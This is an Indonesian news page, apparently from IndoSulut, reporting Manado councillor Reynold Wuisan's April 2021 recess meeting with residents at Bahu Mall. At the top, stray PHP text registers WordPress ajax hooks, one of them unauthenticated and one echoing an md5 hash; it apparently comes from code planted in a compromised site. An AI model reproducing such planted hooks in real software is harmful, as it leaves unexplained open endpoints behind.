function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Reynold Wuisan Gelar Reses I di Star Square Bahu Mall – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 12 Apr 2021 23:54 WIB ·

Reynold Wuisan Gelar Reses I di Star Square Bahu Mall


					Reynold Wuisan Gelar Reses I di Star Square Bahu Mall Perbesar

 

MANADO – Anggota Komisi II DPRD Manado Reynold Wuisan, menggelar reses pertama tahun 2021 di Star Square Bahu Mall, Kelurahan Bahu, Kecamatan Malalayang, Senin (12/4/2021).

Dikesempatan itu, Lurah Bahu, Krismas Stevanus Tampi mengatakan, reses ini lain dari pada yang lain dengan dilaksanakan di Bahu Mall. Namun tetap mematuhi prokes.

“Kita tetap akan melakukan secara cepat saja, mengingat waktu. Reses ini untuk menampung aspirasi masyarakat di kelurahan bahu untuk disampaikan ke anggota dewan dengan sistem sekarang menggunakan kuisioner. Jadi ada 3 kosioner saja yang akan kita bahas dalam rangka menghemat waktu,” katanya.

Dalam agenda reses yang dilangsungkan dengan mengikuti protokol kesehatan, legislator Partai Hanura ini menerima sejumlah aspirasi dari warga yang hadir. Seperti penerangan jalan, penerima UMKM, dana lansia, vaksinasi publik, serta beberapa masalah klasik terkait infrastruktur.

Mendengar itu, Wuisan mengaku akan mengawal dan membawa setiap aspirasi ke instansi terkait.

“Sebelumnya saya sudah berjalan ke setiap masyarakat untuk memberikan kuesioner supaya mengisi semua keluhan. Selanjutnya saya akan mengawal aspirasi masyarakat dengan berdasarkan skala prioritas,” ujar Reynold.

“Terimakasih semua masyarakat yang telah hadir dan pemerintah yang turut memfasilitasi, dan terimakasih pihak mall yang sudah menyediakan tempat. Semoga semua sehat semua,” tutupnya.

Artikel ini telah dibaca 13 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized